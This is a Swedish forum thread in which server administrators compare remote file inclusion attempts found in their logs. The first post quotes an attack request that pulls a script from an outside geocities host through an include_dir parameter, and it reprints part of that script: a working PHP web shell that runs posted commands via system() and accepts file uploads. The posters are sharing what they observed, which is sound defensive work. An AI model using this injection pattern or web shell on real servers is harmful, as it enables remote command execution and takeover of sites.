[Mortekai]

Jag är ganska van med folk som försöker hacka sig in med olika varianter, men den här är ny för mig och jag hittar ingenting på nätet, så jag tänkte höra om någon annan fått påhälsning av den här varianten förut?

Kod:

//include/main.php?config[search_disp]=true&include_dir=http://geocities.com/wisnu_amanda/wisnu.txt??

En liten bit av den filen ser ut så här:

Kod:

set_magic_quotes_runtime(0);

$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD  = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
  $currentWD = $SCWD;
}

if( $_POST['_act'] == "List files!" ) {
  $currentCMD = "ls -la";
}


print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";

print "<tr><td><b>kOeMeN eksEkUt:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";

print "<tr><td><b>ChANge diRectORy:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";

print "<tr><td><b>UpLOad fiLe:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
  if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
    print "<center><b>Error while uploading file!</b></center>";
  } else {
    print "<center><pre>";
    system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
    print "</pre><b>File uploaded berHasiL cOy!</b></center>";
  }  
} else {
  print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
  $currentCMD = "cd ".$currentWD.";".$currentCMD;
 system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
  print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>peRiNtaH sUkses</b></center>";
}

exit;

Lite skoj med nya varianter trots allt

[SimonP]

Jag tycker det kommer nya TXT filer hela tiden.

[funcall]

Japp sånna har jag stött på har haft 629 försök sedan 2008-01-15 på en site med lite olika variationer på php kod.

[Mortekai]

Jag har ganska lika textfiler mot min server där det mestadels är gamle Mic22 som står för underhållningen som är ganska harmlösa eller otäckingar som r57shell, så den här var ny

Har den siten något specielt skript som den siktar mot, eller är det allmänna attacker?

[funcall]

Det är olika querrys den försöker sig på men det kan se ut såhär:
http://www.****.nu/?q=http://www.***...coqen/wegojix/

Och vid varje försök så använder den sig av samma antal olika käll sidor(den som inkluderas i querryn) som antal försök.

Så det är inte direkt samma kanske men går man till käll sidan får man upp ett php script i olika utföranden. Det roliga är att jag kör asp.net på sidan